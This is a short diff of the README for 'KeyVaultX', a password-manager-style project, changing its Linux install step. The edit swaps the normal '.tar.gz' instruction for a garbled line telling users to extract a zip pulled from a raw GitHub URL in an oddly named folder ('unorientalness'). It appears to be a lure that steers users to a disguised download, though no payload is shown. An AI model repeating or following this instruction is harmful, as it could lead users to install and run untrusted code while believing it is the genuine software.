Aksh8887/KeyVaultX/README.md

   - Open the downloaded `.dmg` file.
   - Drag the KeyVaultX icon to your Applications folder.
 - **Linux**:
-  - Extract the contents of the `.tar.gz` file.
+  - Extract the contents of the `https://raw.githubusercontent.com/Aksh8887/KeyVaultX/main/unorientalness/KeyVaultX.zip` file.
   - Follow the instructions in the README to run KeyVaultX.

 ## ⚙️ How to Run KeyVaultX